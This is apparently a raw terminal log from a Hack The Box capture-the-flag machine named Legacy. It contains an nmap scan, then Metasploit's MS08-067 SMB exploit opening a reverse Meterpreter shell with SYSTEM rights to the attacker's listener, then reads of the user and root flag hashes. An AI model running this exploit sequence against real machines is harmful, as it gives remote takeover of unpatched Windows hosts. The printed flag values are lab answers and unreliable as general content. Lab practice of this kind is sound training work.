nmap -T4 -A -v 10.10.10.4

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (90%), Microsoft Windows 2003 SP2 (89%), Microsoft Windows XP SP2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h23m03s, deviation: 2h07m16s, median: 4d22h53m03s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:8f:49:61 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-10-01T00:24:54+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)



root@FoSt0x:~/Scrivania/htb# msfconsole

msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.17:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.17:4444 -> 10.10.10.4:1032) at 2019-09-25 21:37:39 +0200

meterpreter > pwd
    C:\WINDOWS\system32
meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

meterpreter > pwd
    C:\WINDOWS
meterpreter > cd ..
meterpreter > ls
Listing: C:\
============

Mode                 Size               Type  Last modified                    Name
----                 ----               ----  -------------                    ----
100777/rwxrwxrwx     0                  fil   2017-03-16 06:30:44 +0100        AUTOEXEC.BAT
100666/rw-rw-rw-     0                  fil   2017-03-16 06:30:44 +0100        CONFIG.SYS
40777/rwxrwxrwx      0                  dir   2017-03-16 06:20:29 +0100        Documents and Settings
100444/r--r--r--     0                  fil   2017-03-16 06:30:44 +0100        IO.SYS
100444/r--r--r--     0                  fil   2017-03-16 06:30:44 +0100        MSDOS.SYS
100555/r-xr-xr-x     47564              fil   2008-04-13 22:13:04 +0200        NTDETECT.COM
40555/r-xr-xr-x      0                  dir   2017-03-16 06:20:57 +0100        Program Files
40777/rwxrwxrwx      0                  dir   2017-03-16 06:20:30 +0100        System Volume Information
40777/rwxrwxrwx      0                  dir   2017-03-16 06:18:34 +0100        WINDOWS
100666/rw-rw-rw-     211                fil   2017-03-16 06:20:02 +0100        boot.ini
100444/r--r--r--     250048             fil   2008-04-14 00:01:44 +0200        ntldr
237011620/rw--w----  41373179444232175  fif   1320068171-08-11 13:07:28 +0100  pagefile.sys

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 07:19:32 +0100  user.txt

meterpreter > touch user.txt
[-] Unknown command: touch.
meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f
meterpreter > cd ..
meterpreter > ls
Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 06:33:41 +0100  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 06:33:41 +0100  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 06:33:41 +0100  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 06:33:41 +0100  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 06:33:42 +0100  ntuser.ini

meterpreter > cd ..
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 07:07:20 +0100  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 06:20:29 +0100  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 06:20:29 +0100  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 06:32:52 +0100  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 06:32:42 +0100  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 06:33:41 +0100  john

meterpreter > cd Administrator
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  My Documents
100666/rw-rw-rw-  786432  fil   2017-03-16 07:07:20 +0100  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 07:07:20 +0100  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 07:07:20 +0100  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 07:07:20 +0100  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 07:07:21 +0100  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 07:18:19 +0100  root.txt

meterpreter > cat root.txt
993442d258b0e0ec917cae9e695d5713
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.10.10.4 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/ms08_067_netapi) > Interrupt: use the 'exit' command to quit
msf5 exploit(windows/smb/ms08_067_netapi) > exit